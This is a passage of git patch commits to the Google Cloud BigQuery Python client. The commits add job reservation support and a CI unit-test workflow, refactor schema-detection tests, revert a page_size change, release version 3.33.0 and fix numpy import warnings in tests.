schema.SchemaField("timestamp_array", field_type=None, mode="NULLABLE"), - schema.SchemaField("datetime_array", field_type=None, mode="NULLABLE"), - ) - - with warnings.catch_warnings(record=True) as warned: - augmented_schema = module_under_test.augment_schema(dataframe, current_schema) - - # there should be no relevant warnings - unwanted_warnings = [ - warning for warning in warned if "Pyarrow could not" in str(warning) - ] - assert not unwanted_warnings - # the augmented schema must match the expected - expected_schema = ( + expected_schemas = ( schema.SchemaField("string_array", field_type="STRING", mode="REPEATED"), schema.SchemaField("timestamp_array", field_type="TIMESTAMP", mode="REPEATED"), schema.SchemaField("datetime_array", field_type="DATETIME", mode="REPEATED"), ) - by_name = operator.attrgetter("name") - assert sorted(augmented_schema, key=by_name) == sorted(expected_schema, key=by_name) + for col_name, expected_schema in zip(dataframe, expected_schemas): + with warnings.catch_warnings(record=True) as warned: + schema_field = module_under_test._get_schema_by_pyarrow( + col_name, dataframe[col_name] + ) + assert warned == [] + assert schema_field == expected_schema @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") @@ -1681,24 +1652,21 @@ def test_augment_schema_type_detection_fails(module_under_test): }, ] ) - current_schema = [ - schema.SchemaField("status", field_type="STRING", mode="NULLABLE"), - schema.SchemaField("struct_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("struct_field_2", field_type=None, mode="NULLABLE"), - ] - - with warnings.catch_warnings(record=True) as warned: - augmented_schema = module_under_test.augment_schema(dataframe, current_schema) - assert augmented_schema is None + expected_schemas = ( + schema.SchemaField("status", field_type="STRING", mode="NULLABLE"), + # Could not determine the type of these columns + None, + None, + ) - expected_warnings = [ - warning for warning in warned if "could not determine" in str(warning) - ] - assert len(expected_warnings) == 1 - warning_msg = str(expected_warnings[0]) - assert "pyarrow" in warning_msg.lower() - assert "struct_field" in warning_msg and "struct_field_2" in warning_msg + for col_name, expected_schema in zip(dataframe, expected_schemas): + with warnings.catch_warnings(record=True) as warned: + schema_field = module_under_test._get_schema_by_pyarrow( + col_name, dataframe[col_name] + ) + assert warned == [] + assert schema_field == expected_schema @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") @@ -1706,23 +1674,14 @@ def test_augment_schema_type_detection_fails_array_data(module_under_test): dataframe = pandas.DataFrame( data=[{"all_none_array": [None, float("NaN")], "empty_array": []}] ) - current_schema = [ - schema.SchemaField("all_none_array", field_type=None, mode="NULLABLE"), - schema.SchemaField("empty_array", field_type=None, mode="NULLABLE"), - ] - - with warnings.catch_warnings(record=True) as warned: - augmented_schema = module_under_test.augment_schema(dataframe, current_schema) - assert augmented_schema is None - - expected_warnings = [ - warning for warning in warned if "could not determine" in str(warning) - ] - assert len(expected_warnings) == 1 - warning_msg = str(expected_warnings[0]) - assert "pyarrow" in warning_msg.lower() - assert "all_none_array" in warning_msg and "empty_array" in warning_msg + for col_name in dataframe: + with warnings.catch_warnings(record=True) as warned: + schema_field = module_under_test._get_schema_by_pyarrow( + col_name, dataframe[col_name] + ) + assert warned == [] + assert schema_field is None @pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index 3f2304a70..c63a8312c 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -640,11 +640,6 @@ def test___repr__(self): expected = "SchemaField('field1', 'STRING', 'NULLABLE', None, None, (), None)" self.assertEqual(repr(field1), expected) - def test___repr__type_not_set(self): - field1 = self._make_one("field1", field_type=None) - expected = "SchemaField('field1', None, 'NULLABLE', None, None, (), None)" - self.assertEqual(repr(field1), expected) - def test___repr__evaluable_no_policy_tags(self): field = self._make_one("field1", "STRING", "REQUIRED", "Description") field_repr = repr(field) From cb646ceea172bf199f366ae0592546dff2d3bcb2 Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Mon, 19 May 2025 12:10:12 -0700 Subject: [PATCH 105/202] feat: support job reservation (#2186) * feat: support job reservation * Update google/cloud/bigquery/job/base.py Co-authored-by: Chalmer Lowe --------- Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/job/base.py | 32 +++++++++++++++++++++++ tests/unit/job/test_base.py | 42 +++++++++++++++++++++++++++++++ 2 files changed, 74 insertions(+) diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index eaa9d3460..5eb700ce7 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -224,6 +224,26 @@ def job_timeout_ms(self, value): else: self._properties.pop("jobTimeoutMs", None) + @property + def reservation(self): + """str: Optional. The reservation that job would use. + + User can specify a reservation to execute the job. If reservation is + not set, reservation is determined based on the rules defined by the + reservation assignments. The expected format is + projects/{project}/locations/{location}/reservations/{reservation}. + + Raises: + ValueError: If ``value`` type is not None or of string type. + """ + return self._properties.setdefault("reservation", None) + + @reservation.setter + def reservation(self, value): + if value and not isinstance(value, str): + raise ValueError("Reservation must be None or a string.") + self._properties["reservation"] = value + @property def labels(self): """Dict[str, str]: Labels for the job. @@ -488,6 +508,18 @@ def location(self): """str: Location where the job runs.""" return _helpers._get_sub_prop(self._properties, ["jobReference", "location"]) + @property + def reservation_id(self): + """str: Name of the primary reservation assigned to this job. + + Note that this could be different than reservations reported in + the reservation field if parent reservations were used to execute + this job. + """ + return _helpers._get_sub_prop( + self._properties, ["statistics", "reservation_id"] + ) + def _require_client(self, client): """Check client or verify over-ride. diff --git a/tests/unit/job/test_base.py b/tests/unit/job/test_base.py index 22a0fa450..aa3d49ce3 100644 --- a/tests/unit/job/test_base.py +++ b/tests/unit/job/test_base.py @@ -443,6 +443,16 @@ def test_state(self): status["state"] = state self.assertEqual(job.state, state) + def test_reservation_id(self): + reservation_id = "RESERVATION-ID" + client = _make_client(project=self.PROJECT) + job = self._make_one(self.JOB_ID, client) + self.assertIsNone(job.reservation_id) + stats = job._properties["statistics"] = {} + self.assertIsNone(job.reservation_id) + stats["reservation_id"] = reservation_id + self.assertEqual(job.reservation_id, reservation_id) + def _set_properties_job(self): client = _make_client(project=self.PROJECT) job = self._make_one(self.JOB_ID, client) @@ -1188,15 +1198,18 @@ def test_fill_query_job_config_from_default(self): job_config = QueryJobConfig() job_config.dry_run = True job_config.maximum_bytes_billed = 1000 + job_config.reservation = "reservation_1" default_job_config = QueryJobConfig() default_job_config.use_query_cache = True default_job_config.maximum_bytes_billed = 2000 + default_job_config.reservation = "reservation_2" final_job_config = job_config._fill_from_default(default_job_config) self.assertTrue(final_job_config.dry_run) self.assertTrue(final_job_config.use_query_cache) self.assertEqual(final_job_config.maximum_bytes_billed, 1000) + self.assertEqual(final_job_config.reservation, "reservation_1") def test_fill_load_job_from_default(self): from google.cloud.bigquery import LoadJobConfig @@ -1204,15 +1217,18 @@ def test_fill_load_job_from_default(self): job_config = LoadJobConfig() job_config.create_session = True job_config.encoding = "UTF-8" + job_config.reservation = "reservation_1" default_job_config = LoadJobConfig() default_job_config.ignore_unknown_values = True default_job_config.encoding = "ISO-8859-1" + default_job_config.reservation = "reservation_2" final_job_config = job_config._fill_from_default(default_job_config) self.assertTrue(final_job_config.create_session) self.assertTrue(final_job_config.ignore_unknown_values) self.assertEqual(final_job_config.encoding, "UTF-8") + self.assertEqual(final_job_config.reservation, "reservation_1") def test_fill_from_default_conflict(self): from google.cloud.bigquery import QueryJobConfig @@ -1232,10 +1248,12 @@ def test_fill_from_empty_default_conflict(self): job_config = QueryJobConfig() job_config.dry_run = True job_config.maximum_bytes_billed = 1000 + job_config.reservation = "reservation_1" final_job_config = job_config._fill_from_default(default_job_config=None) self.assertTrue(final_job_config.dry_run) self.assertEqual(final_job_config.maximum_bytes_billed, 1000) + self.assertEqual(final_job_config.reservation, "reservation_1") @mock.patch("google.cloud.bigquery._helpers._get_sub_prop") def test__get_sub_prop_wo_default(self, _get_sub_prop): @@ -1338,3 +1356,27 @@ def test_job_timeout_properties(self): job_config.job_timeout_ms = None assert job_config.job_timeout_ms is None assert "jobTimeoutMs" not in job_config._properties + + def test_reservation_miss(self): + job_config = self._make_one() + self.assertEqual(job_config.reservation, None) + + def test_reservation_hit(self): + job_config = self._make_one() + job_config._properties["reservation"] = "foo" + self.assertEqual(job_config.reservation, "foo") + + def test_reservation_update_in_place(self): + job_config = self._make_one() + job_config.reservation = "bar" # update in place + self.assertEqual(job_config.reservation, "bar") + + def test_reservation_setter_invalid(self): + job_config = self._make_one() + with self.assertRaises(ValueError): + job_config.reservation = object() + + def test_reservation_setter(self): + job_config = self._make_one() + job_config.reservation = "foo" + self.assertEqual(job_config._properties["reservation"], "foo") From bf58ca5425809b08895eebfa74a8ef5c559a69ac Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Mon, 19 May 2025 16:54:24 -0400 Subject: [PATCH 106/202] ci: Update to the CI/CD pipeline via github workflow to help cut turn-around time (#2189) Update to the CI/CD pipeline via github workflow to help cut turn-around time. * added github workflow * changed the number of pytest-xdist workers from "auto" to "8" (based on local tests and discussion with Tim, choosing auto sometimes takes longer to run than choosing a smaller number. I suspect this is partly because for small or short tests the overhead needed to setup a worker exceeds the time savings of having extra workers). * modified numerous tests to explicitly include a project path to avoid an attempt to find the project by making an external call via the pydata-google-auth workflow (which opens an input and waits for response from the user that never comes). --- .github/workflows/unittest.yml | 89 ++++++++++++++++++++++++++++++++++ noxfile.py | 2 +- tests/unit/test_magics.py | 30 +++++++++++- 3 files changed, 118 insertions(+), 3 deletions(-) create mode 100644 .github/workflows/unittest.yml diff --git a/.github/workflows/unittest.yml b/.github/workflows/unittest.yml new file mode 100644 index 000000000..24c9ddbaf --- /dev/null +++ b/.github/workflows/unittest.yml @@ -0,0 +1,89 @@ +on: + pull_request: + branches: + - main +name: unittest +jobs: + unit: + # Use `ubuntu-latest` runner. + runs-on: ubuntu-latest + strategy: + matrix: + python: ['3.9', '3.11', '3.12', '3.13'] + steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Setup Python + uses: actions/setup-python@v5 + with: + python-version: ${{ matrix.python }} + - name: Install nox + run: | + python -m pip install --upgrade setuptools pip wheel + python -m pip install nox + - name: Run unit tests + env: + COVERAGE_FILE: .coverage-${{ matrix.python }} + run: | + nox -s unit-${{ matrix.python }} + - name: Upload coverage results + uses: actions/upload-artifact@v4 + with: + name: coverage-artifact-${{ matrix.python }} + path: .coverage-${{ matrix.python }} + include-hidden-files: true + + unit_noextras: + # Use `ubuntu-latest` runner. + runs-on: ubuntu-latest + strategy: + matrix: + python: ['3.9', '3.13'] + steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Setup Python + uses: actions/setup-python@v5 + with: + python-version: ${{ matrix.python }} + - name: Install nox + run: | + python -m pip install --upgrade setuptools pip wheel + python -m pip install nox + - name: Run unit_noextras tests + env: + COVERAGE_FILE: .coverage-unit-noextras-${{ matrix.python }} + run: | + nox -s unit_noextras-${{ matrix.python }} + - name: Upload coverage results + uses: actions/upload-artifact@v4 + with: + name: coverage-artifact-unit-noextras-${{ matrix.python }} + path: .coverage-unit-noextras-${{ matrix.python }} + include-hidden-files: true + + cover: + runs-on: ubuntu-latest + needs: + - unit + - unit_noextras + steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Setup Python + uses: actions/setup-python@v5 + with: + python-version: "3.9" + - name: Install coverage + run: | + python -m pip install --upgrade setuptools pip wheel + python -m pip install coverage + - name: Download coverage results + uses: actions/download-artifact@v4 + with: + path: .coverage-results/ + - name: Report coverage results + run: | + find .coverage-results -type f -name '*.zip' -exec unzip {} \; + coverage combine .coverage-results/**/.coverage* + coverage report --show-missing --fail-under=100 diff --git a/noxfile.py b/noxfile.py index 1922a68a5..575bbb100 100644 --- a/noxfile.py +++ b/noxfile.py @@ -128,7 +128,7 @@ def default(session, install_extras=True): # Run py.test against the unit tests. session.run( "py.test", - "-n=auto", + "-n=8", "--quiet", "-W default::PendingDeprecationWarning", "--cov=google/cloud/bigquery", diff --git a/tests/unit/test_magics.py b/tests/unit/test_magics.py index 0f1e030cb..a9a12283b 100644 --- a/tests/unit/test_magics.py +++ b/tests/unit/test_magics.py @@ -480,6 +480,7 @@ def test_bigquery_magic_without_optional_arguments(monkeypatch): run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -831,6 +832,7 @@ def test_bigquery_magic_w_max_results_query_job_results_fails(monkeypatch): assert close_transports.called +@pytest.mark.usefixtures("ipython_interactive") def test_bigquery_magic_w_table_id_invalid(monkeypatch): ip = IPython.get_ipython() monkeypatch.setattr(bigquery, "bigquery_magics", None) @@ -861,6 +863,7 @@ def test_bigquery_magic_w_table_id_invalid(monkeypatch): assert "Traceback (most recent call last)" not in output +@pytest.mark.usefixtures("ipython_interactive") def test_bigquery_magic_w_missing_query(monkeypatch): ip = IPython.get_ipython() monkeypatch.setattr(bigquery, "bigquery_magics", None) @@ -1354,6 +1357,8 @@ def test_bigquery_magic_w_progress_bar_type_w_context_setter(monkeypatch): run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1383,6 +1388,8 @@ def test_bigquery_magic_with_progress_bar_type(monkeypatch): run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + with run_query_patch as run_query_mock: ip.run_cell_magic( "bigquery", "--progress_bar_type=tqdm_gui", "SELECT 17 as num" @@ -1565,6 +1572,8 @@ def test_bigquery_magic_with_string_params(ipython_ns_cleanup, monkeypatch): run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1605,6 +1614,8 @@ def test_bigquery_magic_with_dict_params(ipython_ns_cleanup, monkeypatch): run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1689,6 +1700,7 @@ def test_bigquery_magic_with_option_value_incorrect(monkeypatch): magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "unit-test-project" sql = "SELECT @foo AS foo" @@ -1719,6 +1731,8 @@ def test_bigquery_magic_with_dict_params_negative_value( run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1760,6 +1774,8 @@ def test_bigquery_magic_with_dict_params_array_value(ipython_ns_cleanup, monkeyp run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1801,6 +1817,8 @@ def test_bigquery_magic_with_dict_params_tuple_value(ipython_ns_cleanup, monkeyp run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1852,6 +1870,7 @@ def test_bigquery_magic_valid_query_in_existing_variable( magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "unit-test-project" ipython_ns_cleanup.append((ip, "custom_query")) ipython_ns_cleanup.append((ip, "query_results_df")) @@ -1892,6 +1911,7 @@ def test_bigquery_magic_nonexisting_query_variable(monkeypatch): magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "unit-test-project" run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True @@ -1917,7 +1937,7 @@ def test_bigquery_magic_empty_query_variable_name(monkeypatch): magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) - + magics.context.project = "unit-test-project" run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) @@ -1940,6 +1960,7 @@ def test_bigquery_magic_query_variable_non_string(ipython_ns_cleanup, monkeypatc magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "unit-test-project" run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True @@ -1968,9 +1989,14 @@ def test_bigquery_magic_query_variable_not_identifier(monkeypatch): google.auth.credentials.Credentials, instance=True ) + magics.context.project = "unit-test-project" cell_body = "$123foo" # 123foo is not valid Python identifier - with io.capture_output() as captured_io: + run_query_patch = mock.patch( + "google.cloud.bigquery.magics.magics._run_query", autospec=True + ) + + with run_query_patch, io.capture_output() as captured_io: ip.run_cell_magic("bigquery", "", cell_body) # If "$" prefixes a string that is not a Python identifier, we do not treat such From 06ee3df6c5346e5041ebab80da8b2a299378444c Mon Sep 17 00:00:00 2001 From: Chelsea Lin Date: Mon, 19 May 2025 16:02:21 -0700 Subject: [PATCH 107/202] Revert "fix: table iterator should not use bqstorage when page_size is not None (#2154)" (#2191) This reverts commit e89a707b162182ededbf94cc9a0f7594bc2be475. --- google/cloud/bigquery/table.py | 11 ++--------- tests/unit/test_dbapi_cursor.py | 1 - tests/unit/test_table.py | 7 ------- 3 files changed, 2 insertions(+), 17 deletions(-) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index e084468f6..3f472c490 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1897,11 +1897,6 @@ def total_bytes_processed(self) -> Optional[int]: """total bytes processed from job statistics, if present.""" return self._total_bytes_processed - @property - def page_size(self) -> Optional[int]: - """The maximum number of rows in each page of results from this request, if present.""" - return self._page_size - def _is_almost_completely_cached(self): """Check if all results are completely cached. @@ -1953,7 +1948,7 @@ def _should_use_bqstorage(self, bqstorage_client, create_bqstorage_client): if self._is_almost_completely_cached(): return False - if self.max_results is not None or self.page_size is not None: + if self.max_results is not None: return False try: @@ -2023,9 +2018,7 @@ def _maybe_warn_max_results( bqstorage_client: The BigQuery Storage client intended to use for downloading result rows. """ - if bqstorage_client is not None and ( - self.max_results is not None or self.page_size is not None - ): + if bqstorage_client is not None and self.max_results is not None: warnings.warn( "Cannot use bqstorage_client if max_results is set, " "reverting to fetching data with the REST endpoint.", diff --git a/tests/unit/test_dbapi_cursor.py b/tests/unit/test_dbapi_cursor.py index cba9030de..6fca4cec0 100644 --- a/tests/unit/test_dbapi_cursor.py +++ b/tests/unit/test_dbapi_cursor.py @@ -161,7 +161,6 @@ def _mock_rows( mock_rows, ) mock_rows.max_results = None - mock_rows.page_size = None type(mock_rows).job_id = mock.PropertyMock(return_value="test-job-id") type(mock_rows).location = mock.PropertyMock(return_value="test-location") type(mock_rows).num_dml_affected_rows = mock.PropertyMock( diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 92fa0e2ec..4791c6511 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -2858,13 +2858,6 @@ def test__should_use_bqstorage_returns_false_if_max_results_set(self): ) self.assertFalse(result) - def test__should_use_bqstorage_returns_false_if_page_size_set(self): - iterator = self._make_one(page_size=10, first_page_response=None) # not cached - result = iterator._should_use_bqstorage( - bqstorage_client=None, create_bqstorage_client=True - ) - self.assertFalse(result) - def test__should_use_bqstorage_returns_false_w_warning_if_missing_dependency(self): iterator = self._make_one(first_page_response=None) # not cached From b140fca726488106693aaf14695cb7bb9b4b2796 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Mon, 19 May 2025 16:27:29 -0700 Subject: [PATCH 108/202] chore(main): release 3.33.0 (#2180) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> Co-authored-by: Lingqing Gan --- CHANGELOG.md | 15 +++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 16 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index ff1bd7acc..2f7166d44 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,21 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.33.0](https://github.com/googleapis/python-bigquery/compare/v3.32.0...v3.33.0) (2025-05-19) + + +### Features + +* Add ability to set autodetect_schema query param in update_table ([#2171](https://github.com/googleapis/python-bigquery/issues/2171)) ([57f940d](https://github.com/googleapis/python-bigquery/commit/57f940d957613b4d80fb81ea40a1177b73856189)) +* Add dtype parameters to to_geodataframe functions ([#2176](https://github.com/googleapis/python-bigquery/issues/2176)) ([ebfd0a8](https://github.com/googleapis/python-bigquery/commit/ebfd0a83d43bcb96f65f5669437220aa6138b766)) +* Support job reservation ([#2186](https://github.com/googleapis/python-bigquery/issues/2186)) ([cb646ce](https://github.com/googleapis/python-bigquery/commit/cb646ceea172bf199f366ae0592546dff2d3bcb2)) + + +### Bug Fixes + +* Ensure AccessEntry equality and repr uses the correct `entity_type` ([#2182](https://github.com/googleapis/python-bigquery/issues/2182)) ([0217637](https://github.com/googleapis/python-bigquery/commit/02176377d5e2fc25b5cd4f46aa6ebfb1b6a960a6)) +* Ensure SchemaField.field_dtype returns a string ([#2188](https://github.com/googleapis/python-bigquery/issues/2188)) ([7ec2848](https://github.com/googleapis/python-bigquery/commit/7ec2848379d5743bbcb36700a1153540c451e0e0)) + ## [3.32.0](https://github.com/googleapis/python-bigquery/compare/v3.31.0...v3.32.0) (2025-05-12) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index fe13d2477..8304ac025 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.32.0" +__version__ = "3.33.0" From a3d6bf3a8d674984957997e965a811fa58dfc4a6 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 20 May 2025 10:21:22 -0400 Subject: [PATCH 109/202] ci: Import numpy before pyarrow in tests to resolve import warning (#2187) * Fix: Import numpy before pyarrow in tests to resolve import warning A `PytestDeprecationWarning` was occurring in several test files because `pyarrow`, when imported by `pytest.importorskip`, would fail to import `numpy.core.multiarray`. This change addresses the warning by explicitly importing `numpy` before `pytest.importorskip("pyarrow", ...)` in the affected test files. This ensures that numpy is fully initialized before pyarrow attempts to use it, resolving the underlying import error. I also updated the test execution to use `nox -s unit`, which correctly sets up the test environment and dependencies, allowing the tests to pass and confirm the warning is resolved. Pre-existing failures in `tests/unit/test_magics.py` are unrelated to this change. * Update tests/unit/test__pyarrow_helpers.py * revisions to numpy handling * adds import or skip commands to accompany pyarrow import or skips * Update tests/unit/test__pandas_helpers.py * updates an import step and restores gc import * Updates magics.context and removes unneeded? reference to numpy/pyarrow --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- noxfile.py | 3 +-- testing/constraints-3.9.txt | 1 + tests/unit/test__pandas_helpers.py | 1 + tests/unit/test__pyarrow_helpers.py | 2 +- tests/unit/test_dbapi__helpers.py | 1 + tests/unit/test_magics.py | 5 +++++ tests/unit/test_table.py | 28 ++++++++++++++++++++++++++-- tests/unit/test_table_arrow.py | 3 ++- 8 files changed, 38 insertions(+), 6 deletions(-) diff --git a/noxfile.py b/noxfile.py index 575bbb100..6807b7ee4 100644 --- a/noxfile.py +++ b/noxfile.py @@ -163,8 +163,7 @@ def unit_noextras(session): # so that it continues to be an optional dependency. # https://github.com/googleapis/python-bigquery/issues/1877 if session.python == UNIT_TEST_PYTHON_VERSIONS[0]: - session.install("pyarrow==4.0.0") - + session.install("pyarrow==4.0.0", "numpy==1.20.2") default(session, install_extras=False) diff --git a/testing/constraints-3.9.txt b/testing/constraints-3.9.txt index 60a155f0d..f61c0cf09 100644 --- a/testing/constraints-3.9.txt +++ b/testing/constraints-3.9.txt @@ -20,6 +20,7 @@ ipykernel==6.2.0 opentelemetry-api==1.1.0 opentelemetry-instrumentation==0.20b0 opentelemetry-sdk==1.1.0 +numpy==1.20.2 packaging==24.2.0 pandas==1.3.0 pandas-gbq==0.26.1 diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index d87c65581..bc94f5f54 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -1856,6 +1856,7 @@ def test__download_table_bqstorage_shuts_down_workers( Make sure that when the top-level iterator goes out of scope (is deleted), the child threads are also stopped. """ + pytest.importorskip("google.cloud.bigquery_storage_v1") from google.cloud.bigquery import dataset from google.cloud.bigquery import table import google.cloud.bigquery_storage_v1.reader diff --git a/tests/unit/test__pyarrow_helpers.py b/tests/unit/test__pyarrow_helpers.py index 06fc2eb85..c12a526de 100644 --- a/tests/unit/test__pyarrow_helpers.py +++ b/tests/unit/test__pyarrow_helpers.py @@ -14,7 +14,7 @@ import pytest - +numpy = pytest.importorskip("numpy") pyarrow = pytest.importorskip("pyarrow", minversion="3.0.0") diff --git a/tests/unit/test_dbapi__helpers.py b/tests/unit/test_dbapi__helpers.py index 7e1da0034..9907df97b 100644 --- a/tests/unit/test_dbapi__helpers.py +++ b/tests/unit/test_dbapi__helpers.py @@ -210,6 +210,7 @@ def test_empty_iterable(self): self.assertEqual(list(result), []) def test_non_empty_iterable(self): + pytest.importorskip("numpy") pytest.importorskip("pyarrow") from tests.unit.helpers import _to_pyarrow diff --git a/tests/unit/test_magics.py b/tests/unit/test_magics.py index a9a12283b..814150693 100644 --- a/tests/unit/test_magics.py +++ b/tests/unit/test_magics.py @@ -1276,6 +1276,11 @@ def test_bigquery_magic_with_no_query_cache(monkeypatch): bigquery.load_ipython_extension(ip) conn = make_connection() monkeypatch.setattr(magics.context, "_connection", conn) + monkeypatch.setattr( + magics.context, + "credentials", + mock.create_autospec(google.auth.credentials.Credentials, instance=True), + ) monkeypatch.setattr(magics.context, "project", "project-from-context") # --no_query_cache option should override context. diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 4791c6511..eb2c8d9ec 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -2416,6 +2416,7 @@ def test_to_arrow_error_if_pyarrow_is_none(self): row_iterator.to_arrow() def test_to_arrow(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip("pyarrow") row_iterator = self._make_one() tbl = row_iterator.to_arrow() @@ -2423,6 +2424,7 @@ def test_to_arrow(self): self.assertEqual(tbl.num_rows, 0) def test_to_arrow_iterable(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip( "pyarrow", minversion=self.PYARROW_MINIMUM_VERSION ) @@ -3089,6 +3091,7 @@ def test_to_arrow_iterable_w_bqstorage(self): bqstorage_client._transport.grpc_channel.close.assert_not_called() def test_to_arrow(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip( "pyarrow", minversion=self.PYARROW_MINIMUM_VERSION ) @@ -3173,6 +3176,7 @@ def test_to_arrow(self): ) def test_to_arrow_w_nulls(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip( "pyarrow", minversion=self.PYARROW_MINIMUM_VERSION ) @@ -3209,6 +3213,7 @@ def test_to_arrow_w_nulls(self): self.assertEqual(ages, [32, 29, None, 111]) def test_to_arrow_w_unknown_type(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip( "pyarrow", minversion=self.PYARROW_MINIMUM_VERSION ) @@ -3254,6 +3259,7 @@ def test_to_arrow_w_unknown_type(self): self.assertTrue(all("sport" in str(warning) for warning in warned)) def test_to_arrow_w_empty_table(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip( "pyarrow", minversion=self.PYARROW_MINIMUM_VERSION ) @@ -3295,6 +3301,7 @@ def test_to_arrow_w_empty_table(self): self.assertEqual(child_field.type.value_type[1].name, "age") def test_to_arrow_max_results_w_explicit_bqstorage_client_warning(self): + pytest.importorskip("numpy") pytest.importorskip("pyarrow") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery.schema import SchemaField @@ -3337,6 +3344,7 @@ def test_to_arrow_max_results_w_explicit_bqstorage_client_warning(self): mock_client._ensure_bqstorage_client.assert_not_called() def test_to_arrow_max_results_w_create_bqstorage_client_no_warning(self): + pytest.importorskip("numpy") pytest.importorskip("pyarrow") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery.schema import SchemaField @@ -3375,6 +3383,7 @@ def test_to_arrow_max_results_w_create_bqstorage_client_no_warning(self): mock_client._ensure_bqstorage_client.assert_not_called() def test_to_arrow_w_bqstorage(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip("pyarrow") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery import schema @@ -3458,6 +3467,7 @@ def test_to_arrow_w_bqstorage(self): bqstorage_client._transport.grpc_channel.close.assert_not_called() def test_to_arrow_w_bqstorage_creates_client(self): + pytest.importorskip("numpy") pytest.importorskip("pyarrow") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery import schema @@ -3491,6 +3501,7 @@ def test_to_arrow_w_bqstorage_creates_client(self): bqstorage_client._transport.grpc_channel.close.assert_called_once() def test_to_arrow_ensure_bqstorage_client_wo_bqstorage(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip( "pyarrow", minversion=self.PYARROW_MINIMUM_VERSION ) @@ -3524,6 +3535,7 @@ def mock_verify_version(raise_if_error: bool = False): self.assertEqual(tbl.num_rows, 2) def test_to_arrow_w_bqstorage_no_streams(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip("pyarrow") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery import schema @@ -3563,6 +3575,7 @@ 